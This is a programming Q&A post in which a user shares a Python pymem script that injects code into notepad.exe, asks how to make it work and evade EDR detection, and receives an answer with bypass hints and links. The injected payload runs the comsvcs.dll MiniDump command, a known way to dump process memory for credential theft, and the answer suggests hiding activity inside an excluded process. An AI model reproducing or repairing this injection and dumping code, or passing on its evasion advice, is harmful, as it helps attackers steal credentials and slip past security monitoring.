I need to do a process injection using python. Tried the below script. My objective is to see if the script is working and if working then can it be used to evade EDR detection
import pymem
import os
import subprocess
notepad = subprocess.Popen(['notepad.exe'])
pm = pymem.Pymem('notepad.exe')
pm.inject_python_interpreter()
shellcode = """
f = open("C:\TestRule\process_injection.txt", "w+")
f.write("pymem_injection")
f.close()
os.system('rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 988 C:\dump.dmp full')
"""
pm.inject_python_shellcode(shellcode)
notepad.kill()
The command within the shellcode --> os.system('rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 988 C:\dump.dmp full') when ran separately gets blocked by our EDR tool which indicates that it works. But when used in the script nothing happens except opening of notepad . Even I don't see any notification of it getting blocked by EDR. Seems like the code is just ignored .
This I can say because the other code within the shellcode
f = open("C:\TestRule\process_injection.txt", "w+")
f.write("pymem_injection")
f.close()
just works fine .
Can anyone plz tell me what am i doing wrong and suggest any modification in the script
I need to do a process injection using python. Tried the below script. My objective is to see if the script is working and if working then can it be used to evade EDR detection
import pymem
import os
import subprocess
notepad = subprocess.Popen(['notepad.exe'])
pm = pymem.Pymem('notepad.exe')
pm.inject_python_interpreter()
shellcode = """
f = open("C:\TestRule\process_injection.txt", "w+")
f.write("pymem_injection")
f.close()
os.system('rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 988 C:\dump.dmp full')
"""
pm.inject_python_shellcode(shellcode)
notepad.kill()
The command within the shellcode --> os.system('rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 988 C:\dump.dmp full') when ran separately gets blocked by our EDR tool which indicates that it works. But when used in the script nothing happens except opening of notepad . Even I don't see any notification of it getting blocked by EDR. Seems like the code is just ignored .
This I can say because the other code within the shellcode
f = open("C:\TestRule\process_injection.txt", "w+")
f.write("pymem_injection")
f.close()
just works fine .
Can anyone plz tell me what am i doing wrong and suggest any modification in the script
Share Improve this question asked Feb 6 at 11:50 BiswaBiswa 3952 gold badges4 silver badges14 bronze badges1 Answer
Reset to default 0I can't legally suggest a way for you to bypass EDR, but the “rundll32.exe C:\windows\System32\comsvcs.dll” that you have done here can be said that there is no EDR left in the market that will not catch this command. Also, opening a file, writing into it and saving the file is also not ignored by an EDR, you need to do this through a process that is already doing this, so that the EDR will ignore a process that is in exclusion. In short, when trying EDR Bypass, you need to fully understand the working logic first, I can leave you a few links for this;
https://www.vaadata.com/blog/antivirus-and-edr-bypass-techniques/ https://medium.com/@ankitsinha81195_47457/a-deep-dive-into-edr-bypass-strategies-ed25b3929bb1 https://github.com/tkmru/awesome-edr-bypass